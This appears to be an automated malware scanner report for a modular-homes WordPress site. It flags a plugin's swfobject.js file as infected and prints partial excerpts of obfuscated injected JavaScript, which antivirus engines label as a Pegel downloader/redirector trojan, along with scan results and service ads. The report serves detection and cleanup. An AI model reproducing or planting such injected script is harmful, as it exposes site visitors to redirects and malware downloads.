New scan:

Malware Scanner report for georgia-modularhomes.com

Malicious/Suspicious/Total urls checked
1/0/6
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "georgia-modularhomes.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=georgia-modularhomes.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://georgia-modularhomes.com/
200 OK
Content-Length: 16398
Content-Type: text/html
clean
http://georgia-modularhomes.com/wp-content/plugins/kimili-flash-embed/js/swfobject.js
200 OK
Content-Length: 17079
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1
... 3204 bytes are skipped ...
=new U(Yl);var rU=false;var xr="";Qq();this.Yh=false;var XL=new Array();Qq = '';Yl = '';var Kl="Kl";var MX;if(MX!='Kp'){MX='Kp'};Xw = '';ud = '';var oH;if(oH!='Eu'){oH=''};var qL="";D = '';this.Lg="";var QyT=new Date();Ih = '';var wH;if(wH!='QRl'){wH='QRl'};this.IL="";var qp=new String();var bq=new String();var MO='';var AwX=false;return '';this.Ra=false;this.QZM="";};var VW;if(VW!='' && VW!='Vx'){VW='Wl'};var Rm;if(Rm!=''){Rm='Kd'};L(ss);








Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/Pegel.f.4343
Avast
JS:Illredir-S [Trj]
Ad-Aware
Trojan.Downloader.JS.OH
Ikarus
Trojan.JS.Pegel
nProtect
Trojan.Downloader.JS.OH
K7AntiVirus
Trojan ( f4ade2000 )
TrendMicro-HouseCall
TROJ_GEN.F47V1114
Emsisoft
Trojan.Downloader.JS.OH (B)
Comodo
UnclassifiedMalware
K7GW
Exploit ( 04c557561 )
DrWeb
JS.Redirector.12
Kaspersky
Trojan-Downloader.JS.Pegel.g
MicroWorld-eScan
Trojan.Downloader.JS.OH
Fortinet
JS/Pegel.G!tr.dldr
NANO-Antivirus
Trojan.Script.Pegel.yftup
ClamAV
Trojan.JS.Redirector-32
F-Secure
Trojan.Downloader.JS.OH
VIPRE
Trojan.JS.Redirector.bg (v)
AVG
JS/Obfuscated
Sophos
Troj/Iframe-EA
GData
Trojan.Downloader.JS.OH
Symantec
Trojan.Webkit!html
Commtouch
JS/Redir.AQ
ESET-NOD32
JS/TrojanDownloader.Pegel.BB
BitDefender
Trojan.Downloader.JS.OH

http://fs8.formsite.com/fs8_app/FormSite?EParam=8c8wJxzKVbqYFLv6uGJRlipvKh0nslvAzWnv3HbqQ4xtpXhnwnt%2BXYfAYbVDHwrsPo3ruPZOw3GL%0AZSQArXhC2Q%3D%3D&EmbedAllPages=Yes&IncludeContainerCSS=No&actionMethod=http
404 Not Found
Content-Length: 1070
Content-Type: text/html
clean
http://fs8.formsite.com/test404page.js
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=604800
Connection: Close
Date: Mon, 22 Dec 2014 13:19:26 GMT
Location: https://fs8.formsite.com/errors/404.html
Server: Apache
Content-Length: 248
Content-Type: text/html; charset=iso-8859-1
Expires: Mon, 29 Dec 2014 13:19:26 GMT
clean
https://fs8.formsite.com/errors/404.html
200 OK
Content-Length: 1825
Content-Type: text/html
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 19470
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: georgia-modularhomes.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 13:19:22 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
X-Pingback: http://georgia-modularhomes.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: georgia-modularhomes.com
Referer: http://www.google.com/search?q=georgia-modularhomes.com

Result:
The result is similar to the first query. There are no suspicious redirects found.